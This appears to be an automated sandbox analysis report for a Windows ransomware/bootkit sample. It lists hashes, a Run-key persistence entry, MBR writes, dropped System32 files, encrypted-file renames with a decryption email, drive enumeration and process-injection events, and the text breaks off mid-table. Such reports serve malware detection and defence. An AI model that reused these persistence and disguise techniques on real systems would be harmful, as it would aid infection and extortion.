8b0f9d248e67199bb7f1a778a03e4caee7d267e61d8a7d70fa1c1f6d7944e96a

Resubmissions

28/03/2025, 16:52

250328-vdc6kazry9 9

24/03/2025, 22:22

250324-2aphra1jx7 10

Analysis

max time kernel
150s
max time network
140s
platform
windows10-2004_x64
resource
win10v2004-20250313-en
resource tags

arch:x64arch:x86image:win10v2004-20250313-enlocale:en-usos:windows10-2004-x64system
submitted
28/03/2025, 16:52

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe
Size

516KB
MD5

b2b0e6184b82144f65389d39f1eadd0d
SHA1

17311fb1fb33da5f303ae30ee7b4b60b80985d2e
SHA256

3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db
SHA512

d1abc2c74aa2bad9ac8a59c1552904e6d65717786ed7a193c4fcda23218371bcad0953848f1e1c5b9df50a86e2549c6da35c6e372366826dc25f042107a8babb
SSDEEP

12288:j3nZMhJ+ubNmzdCanVtkEY70mOpFRxd/GAXl0xtiNe96bgRO:j3nZqfbkzkcvElOpPj/DA2+6ERO

Score

7^/10

bootkit discovery persistence

Malware Config

Signatures

ACProtect 1.3x - 1.4x DLL software 1 IoCs

Detects file using ACProtect software.

resource	yara_rule
behavioral16/files/0x00070000000241d9-34.dat	acprotect

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Control Panel\International\Geo\Nation	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe

Executes dropped EXE 64 IoCs

pid	Process
5228	svschost.exe
3460	nsf.exe
6056	svschost.exe
4376	nsf.exe
5568	svschost.exe
4352	svschost.exe
5236	svchost.exe
400	svchost.exe
3008	svchost.exe
5732	svchost.exe
4556	svchost.exe
4980	svchost.exe
4836	svchost.exe
4964	svchost.exe
5216	svschost.exe
3648	svchost.exe
3832	svchost.exe
5148	svchost.exe
1736	svchost.exe
3324	svchost.exe
960	svchost.exe
6020	svchost.exe
5620	svchost.exe
2904	svchost.exe
1408	svchost.exe
4488	svchost.exe
5036	svchost.exe
4272	svchost.exe
1776	svchost.exe
2208	svchost.exe
2324	svchost.exe
3360	svchost.exe
2704	svchost.exe
4396	svchost.exe
1504	svchost.exe
1880	svchost.exe
5796	svchost.exe
2548	svchost.exe
532	svchost.exe
396	svchost.exe
1680	svchost.exe
3948	svchost.exe
696	svchost.exe
3548	svchost.exe
5708	svchost.exe
2140	svchost.exe
720	svchost.exe
5776	svchost.exe
3976	svchost.exe
6044	svchost.exe
732	svchost.exe
5500	svchost.exe
5184	svchost.exe
4452	svchost.exe
4684	svchost.exe
2104	svchost.exe
1988	svchost.exe
4976	svchost.exe
4896	svchost.exe
5632	svchost.exe
3328	svchost.exe
3348	svchost.exe
1780	svchost.exe
5268	svchost.exe

Loads dropped DLL 2 IoCs

pid	Process
3460	nsf.exe
4376	nsf.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\svchost = "C:\\scrlk\\svchost.exe"	REG.exe

Enumerates connected drives 3 TTPs 46 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\E:	svschost.exe
File opened (read-only)	\??\M:	svschost.exe
File opened (read-only)	\??\R:	svschost.exe
File opened (read-only)	\??\S:	svschost.exe
File opened (read-only)	\??\U:	svschost.exe
File opened (read-only)	\??\W:	svschost.exe
File opened (read-only)	\??\M:	svchost.exe
File opened (read-only)	\??\Q:	svchost.exe
File opened (read-only)	\??\V:	svschost.exe
File opened (read-only)	\??\X:	svschost.exe
File opened (read-only)	\??\A:	svchost.exe
File opened (read-only)	\??\T:	svchost.exe
File opened (read-only)	\??\V:	svchost.exe
File opened (read-only)	\??\Y:	svchost.exe
File opened (read-only)	\??\Y:	svschost.exe
File opened (read-only)	\??\I:	svchost.exe
File opened (read-only)	\??\R:	svchost.exe
File opened (read-only)	\??\N:	svschost.exe
File opened (read-only)	\??\O:	svschost.exe
File opened (read-only)	\??\B:	svchost.exe
File opened (read-only)	\??\P:	svchost.exe
File opened (read-only)	\??\S:	svchost.exe
File opened (read-only)	\??\U:	svchost.exe
File opened (read-only)	\??\W:	svchost.exe
File opened (read-only)	\??\B:	svschost.exe
File opened (read-only)	\??\P:	svschost.exe
File opened (read-only)	\??\J:	svchost.exe
File opened (read-only)	\??\O:	svchost.exe
File opened (read-only)	\??\H:	svschost.exe
File opened (read-only)	\??\L:	svschost.exe
File opened (read-only)	\??\Z:	svschost.exe
File opened (read-only)	\??\H:	svchost.exe
File opened (read-only)	\??\L:	svchost.exe
File opened (read-only)	\??\X:	svchost.exe
File opened (read-only)	\??\Z:	svchost.exe
File opened (read-only)	\??\A:	svschost.exe
File opened (read-only)	\??\G:	svschost.exe
File opened (read-only)	\??\I:	svschost.exe
File opened (read-only)	\??\J:	svschost.exe
File opened (read-only)	\??\T:	svschost.exe
File opened (read-only)	\??\G:	svchost.exe
File opened (read-only)	\??\K:	svschost.exe
File opened (read-only)	\??\Q:	svschost.exe
File opened (read-only)	\??\E:	svchost.exe
File opened (read-only)	\??\K:	svchost.exe
File opened (read-only)	\??\N:	svchost.exe

Writes to the Master Boot Record (MBR) 1 TTPs 2 IoCs

Bootkits write to the MBR to gain persistence at a level below the operating system.

bootkit persistence

Bootkit

T1542.003

description	ioc	Process
File opened for modification	\??\PhysicalDrive0	nsf.exe
File opened for modification	\??\PhysicalDrive0	nsf.exe

Drops file in System32 directory 17 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SysWOW64\uwnmspwks.rrr	svschost.exe
File created	C:\Windows\SysWOW64\csrss32.dll	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe
File opened for modification	C:\Windows\SysWOW64\csrss64.dll	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe
File opened for modification	C:\Windows\SysWOW64\default2.sfx	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe
File created	C:\Windows\SysWOW64\__tmp_rar_sfx_access_check_240617796	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe
File created	C:\Windows\SysWOW64\default2.sfx	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe
File created	C:\Windows\SysWOW64\__tmp_rar_sfx_access_check_240609156	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe
File opened for modification	C:\Windows\SysWOW64\svschost.exe	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe
File opened for modification	C:\Windows\SysWOW64\csrss32.dll	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe
File created	C:\Windows\SysWOW64\NoSafeMode.dll	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe
File created	C:\Windows\SysWOW64\svschost.exe	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe
File created	C:\Windows\SysWOW64\csrss64.dll	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe
File opened for modification	C:\Windows\SysWOW64\NoSafeMode.dll	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe
File created	C:\Windows\SysWOW64\nsf.exe	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe
File opened for modification	C:\Windows\SysWOW64\nsf.exe	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe
File created	C:\Windows\SysWOW64\cfwin32.dll	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe
File opened for modification	C:\Windows\SysWOW64\cfwin32.dll	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File created	C:\Program Files\Java\jdk-1.8\jre\lib\security\public_suffix_list.dat(!! to decrypt email id 440513544 to [email protected] !!).exe	svchost.exe
File created	C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Colors\Marquee.xml(!! to decrypt email id 440513544 to [email protected] !!).exe	svchost.exe
File created	C:\Program Files\Microsoft Office\root\Office16\LogoImages\FirstRunLogo.scale-80.png(!! to decrypt email id 440513544 to [email protected] !!).exe	svchost.exe
File created	C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\[email protected](!! to decrypt email id 440513544 to [email protected] !!).exe	svchost.exe
File created	C:\Program Files\7-Zip\Lang\nb.txt(!! to decrypt email id 440513544 to [email protected] !!).exe	svchost.exe
File created	C:\Program Files\7-Zip\Lang\pt-br.txt(!! to decrypt email id 440513544 to [email protected] !!).exe	svchost.exe
File created	C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Fonts\Cambria.xml(!! to decrypt email id 440513544 to [email protected] !!).exe	svchost.exe
File created	C:\Program Files\Microsoft Office\root\Office16\1033\PSRCHLTS.DAT(!! to decrypt email id 440513544 to [email protected] !!).exe	svchost.exe
File created	C:\Program Files\Microsoft Office\root\Office16\LogoImages\ExcelLogo.scale-80.png(!! to decrypt email id 440513544 to [email protected] !!).exe	svchost.exe
File created	C:\Program Files\Microsoft Office\root\Office16\LogoImages\ExcelLogoSmall.contrast-white_scale-140.png(!! to decrypt email id 440513544 to [email protected] !!).exe	svchost.exe
File created	C:\Program Files\Microsoft Office\root\Office16\LogoImages\WinWordLogoSmall.contrast-black_scale-80.png(!! to decrypt email id 440513544 to [email protected] !!).exe	svchost.exe
File created	C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Colors\Violet.xml(!! to decrypt email id 440513544 to [email protected] !!).exe	svchost.exe
File created	C:\Program Files\Microsoft Office\root\Office16\LogoImages\OneNoteLogo.contrast-white_scale-180.png(!! to decrypt email id 440513544 to [email protected] !!).exe	svchost.exe
File created	C:\Program Files\7-Zip\Lang\be.txt(!! to decrypt email id 440513544 to [email protected] !!).exe	svchost.exe
File created	C:\Program Files\Microsoft Office\root\Office16\1033\PSRCHSRN.DAT(!! to decrypt email id 440513544 to [email protected] !!).exe	svchost.exe
File created	C:\Program Files\Microsoft Office\root\Office16\LogoImages\OneNoteLogo.scale-180.png(!! to decrypt email id 440513544 to [email protected] !!).exe	svchost.exe
File created	C:\Program Files\Microsoft Office\root\Office16\LogoImages\PowerPntLogo.contrast-white_scale-80.png(!! to decrypt email id 440513544 to [email protected] !!).exe	svchost.exe
File created	C:\Program Files\Microsoft Office\root\Office16\1033\ClientARMRefer2019_eula.txt(!! to decrypt email id 440513544 to [email protected] !!).exe	svchost.exe
File created	C:\Program Files\Microsoft Office\root\Office16\1033\ExcelNaiveBayesCommandRanker.txt(!! to decrypt email id 440513544 to [email protected] !!).exe	svchost.exe
File created	C:\Program Files\Microsoft Office\root\Office16\LogoImages\ExcelLogoSmall.contrast-white_scale-80.png(!! to decrypt email id 440513544 to [email protected] !!).exe	svchost.exe
File created	C:\Program Files\Microsoft Office\root\Office16\LogoImages\PowerPntLogoSmall.contrast-white_scale-100.png(!! to decrypt email id 440513544 to [email protected] !!).exe	svchost.exe
File created	C:\Program Files\Microsoft Office\root\Office16\LogoImages\WinWordLogoSmall.contrast-white_scale-80.png(!! to decrypt email id 440513544 to [email protected] !!).exe	svchost.exe
File created	C:\Program Files\7-Zip\Lang\an.txt(!! to decrypt email id 440513544 to [email protected] !!).exe	svchost.exe
File created	C:\Program Files\Java\jdk-1.8\jre\lib\deploy\ffjcext.zip(!! to decrypt email id 440513544 to [email protected] !!).exe	svchost.exe
File created	C:\Program Files\Microsoft Office\root\Office16\1033\EXCEL_WHATSNEW.XML(!! to decrypt email id 440513544 to [email protected] !!).exe	svchost.exe
File created	C:\Program Files\Microsoft Office\root\Office16\LogoImages\OneNoteLogoSmall.scale-140.png(!! to decrypt email id 440513544 to [email protected] !!).exe	svchost.exe
File created	C:\Program Files\Microsoft Office\root\Office16\LogoImages\PowerPntLogo.contrast-white_scale-140.png(!! to decrypt email id 440513544 to [email protected] !!).exe	svchost.exe
File created	C:\Program Files\Microsoft Office\root\Office16\MSIPC\ThirdPartyNotices.txt(!! to decrypt email id 440513544 to [email protected] !!).exe	svchost.exe
File created	C:\Program Files\Microsoft Office\root\Office16\1033\ClientSub_eula.txt(!! to decrypt email id 440513544 to [email protected] !!).exe	svchost.exe
File created	C:\Program Files\Microsoft Office\root\Office16\LogoImages\OneNoteLogoSmall.contrast-white_scale-180.png(!! to decrypt email id 440513544 to [email protected] !!).exe	svchost.exe
File created	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.VisualElementsManifest.xml(!! to decrypt email id 440513544 to [email protected] !!).exe	svchost.exe
File created	C:\Program Files\7-Zip\Lang\sk.txt(!! to decrypt email id 440513544 to [email protected] !!).exe	svchost.exe
File created	C:\Program Files\Microsoft Office\root\Office16\LogoImages\OneNoteLogo.contrast-black_scale-80.png(!! to decrypt email id 440513544 to [email protected] !!).exe	svchost.exe
File created	C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGLBL115.XML(!! to decrypt email id 440513544 to [email protected] !!).exe	svchost.exe
File created	C:\Program Files\Microsoft Office\PackageManifests\AppXManifest.90160000-0090-0000-1000-0000000FF1CE.xml(!! to decrypt email id 440513544 to [email protected] !!).exe	svchost.exe
File created	C:\Program Files\Microsoft Office\PackageManifests\AppXManifest.90160000-00E1-0409-1000-0000000FF1CE.xml(!! to decrypt email id 440513544 to [email protected] !!).exe	svchost.exe
File created	C:\Program Files\Microsoft Office\root\Integration\C2RManifest.onenotemui.msi.16.en-us.xml(!! to decrypt email id 440513544 to [email protected] !!).exe	svchost.exe
File created	C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGLBL105.XML(!! to decrypt email id 440513544 to [email protected] !!).exe	svchost.exe
File created	C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGMN102.XML(!! to decrypt email id 440513544 to [email protected] !!).exe	svchost.exe
File created	C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\Edit.png(!! to decrypt email id 440513544 to [email protected] !!).exe	svchost.exe
File created	C:\Program Files\Microsoft Office\FileSystemMetadata.xml(!! to decrypt email id 440513544 to [email protected] !!).exe	svchost.exe
File created	C:\Program Files\Microsoft Office\root\Integration\C2RManifest.proofing.msi.16.en-us.xml(!! to decrypt email id 440513544 to [email protected] !!).exe	svchost.exe
File created	C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGLBL111.XML(!! to decrypt email id 440513544 to [email protected] !!).exe	svchost.exe
File created	C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\[email protected](!! to decrypt email id 440513544 to [email protected] !!).exe	svchost.exe
File created	C:\Program Files\Microsoft Office\root\Office16\LogoImages\PowerPntLogoSmall.scale-100.png(!! to decrypt email id 440513544 to [email protected] !!).exe	svchost.exe
File created	C:\Program Files\Microsoft Office\root\Office16\LogoImages\PowerPntLogoSmall.scale-180.png(!! to decrypt email id 440513544 to [email protected] !!).exe	svchost.exe
File created	C:\Program Files\Microsoft Office\root\Office16\LogoImages\WinWordLogoSmall.scale-100.png(!! to decrypt email id 440513544 to [email protected] !!).exe	svchost.exe
File created	C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Fonts\Consolas-Verdana.xml(!! to decrypt email id 440513544 to [email protected] !!).exe	svchost.exe
File created	C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\Delete.White.png(!! to decrypt email id 440513544 to [email protected] !!).exe	svchost.exe
File created	C:\Program Files\7-Zip\Lang\kaa.txt(!! to decrypt email id 440513544 to [email protected] !!).exe	svchost.exe
File created	C:\Program Files\Java\jdk-1.8\javafx-src.zip(!! to decrypt email id 440513544 to [email protected] !!).exe	svchost.exe
File created	C:\Program Files\Microsoft Office\root\Office16\LogoImages\FirstRunLogoSmall.contrast-white_scale-180.png(!! to decrypt email id 440513544 to [email protected] !!).exe	svchost.exe
File created	C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Fonts\Arial.xml(!! to decrypt email id 440513544 to [email protected] !!).exe	svchost.exe
File created	C:\Program Files\Microsoft Office\root\Office16\LivePersonaCard\images\default\linkedin_logo_small.png(!! to decrypt email id 440513544 to [email protected] !!).exe	svchost.exe
File created	C:\Program Files\Microsoft Office\root\Office16\LogoImages\WinWordLogo.contrast-black_scale-80.png(!! to decrypt email id 440513544 to [email protected] !!).exe	svchost.exe
File created	C:\Program Files\Microsoft Office\AppXManifest.xml(!! to decrypt email id 440513544 to [email protected] !!).exe	svchost.exe
File created	C:\Program Files\Microsoft Office\root\Office16\1033\ClientVolumeLicense_eula.txt(!! to decrypt email id 440513544 to [email protected] !!).exe	svchost.exe
File created	C:\Program Files\Microsoft Office\root\Office16\LogoImages\ExcelLogo.contrast-black_scale-180.png(!! to decrypt email id 440513544 to [email protected] !!).exe	svchost.exe
File created	C:\Program Files\Microsoft Office\root\Office16\LogoImages\OneNoteLogo.contrast-black_scale-100.png(!! to decrypt email id 440513544 to [email protected] !!).exe	svchost.exe
File created	C:\Program Files\Microsoft Office\root\Office16\LogoImages\OneNoteLogo.contrast-white_scale-140.png(!! to decrypt email id 440513544 to [email protected] !!).exe	svchost.exe
File created	C:\Program Files\Microsoft Office\PackageManifests\AppXManifest.90160000-006E-0409-1000-0000000FF1CE.xml(!! to decrypt email id 440513544 to [email protected] !!).exe	svchost.exe
File created	C:\Program Files\Microsoft Office\root\Office16\LogoImages\OneNoteLogoSmall.contrast-white_scale-100.png(!! to decrypt email id 440513544 to [email protected] !!).exe	svchost.exe
File created	C:\Program Files\Microsoft Office\root\Office16\LogoImages\OneNoteLogoSmall.scale-100.png(!! to decrypt email id 440513544 to [email protected] !!).exe	svchost.exe
File created	C:\Program Files\Microsoft Office\root\Office16\osfFPA\addins.xml(!! to decrypt email id 440513544 to [email protected] !!).exe	svchost.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PING.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 20 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
5904	PING.EXE
5052	PING.EXE
5376	PING.EXE
692	PING.EXE
4384	PING.EXE
1208	PING.EXE
2356	PING.EXE
2432	PING.EXE
3864	PING.EXE
4988	PING.EXE
5304	PING.EXE
6120	PING.EXE
636	PING.EXE
5060	PING.EXE
6024	PING.EXE
4452	PING.EXE
1988	PING.EXE
1472	PING.EXE
2600	PING.EXE
4652	PING.EXE

Runs ping.exe 1 TTPs 20 IoCs

Remote System Discovery

T1018

pid	Process
1988	PING.EXE
4988	PING.EXE
1208	PING.EXE
2600	PING.EXE
692	PING.EXE
636	PING.EXE
5376	PING.EXE
2432	PING.EXE
4384	PING.EXE
5904	PING.EXE
3864	PING.EXE
1472	PING.EXE
5052	PING.EXE
5060	PING.EXE
6024	PING.EXE
4652	PING.EXE
5304	PING.EXE
6120	PING.EXE
2356	PING.EXE
4452	PING.EXE

Suspicious use of SetWindowsHookEx 2 IoCs

pid	Process
3460	nsf.exe
4376	nsf.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1480 wrote to memory of 5228	1480	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe	88
PID 1480 wrote to memory of 5228	1480	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe	88
PID 1480 wrote to memory of 5228	1480	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe	88
PID 1480 wrote to memory of 3460	1480	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe	90
PID 1480 wrote to memory of 3460	1480	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe	90
PID 1480 wrote to memory of 3460	1480	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe	90
PID 1480 wrote to memory of 3864	1480	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe	91
PID 1480 wrote to memory of 3864	1480	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe	91
PID 1480 wrote to memory of 3864	1480	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe	91
PID 1480 wrote to memory of 1988	1480	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe	95
PID 1480 wrote to memory of 1988	1480	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe	95
PID 1480 wrote to memory of 1988	1480	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe	95
PID 1480 wrote to memory of 4988	1480	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe	100
PID 1480 wrote to memory of 4988	1480	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe	100
PID 1480 wrote to memory of 4988	1480	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe	100
PID 1480 wrote to memory of 1208	1480	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe	104
PID 1480 wrote to memory of 1208	1480	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe	104
PID 1480 wrote to memory of 1208	1480	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe	104
PID 1480 wrote to memory of 1472	1480	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe	106
PID 1480 wrote to memory of 1472	1480	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe	106
PID 1480 wrote to memory of 1472	1480	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe	106
PID 1480 wrote to memory of 2600	1480	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe	108
PID 1480 wrote to memory of 2600	1480	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe	108
PID 1480 wrote to memory of 2600	1480	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe	108
PID 1480 wrote to memory of 692	1480	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe	111
PID 1480 wrote to memory of 692	1480	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe	111
PID 1480 wrote to memory of 692	1480	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe	111
PID 1480 wrote to memory of 4384	1480	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe	113
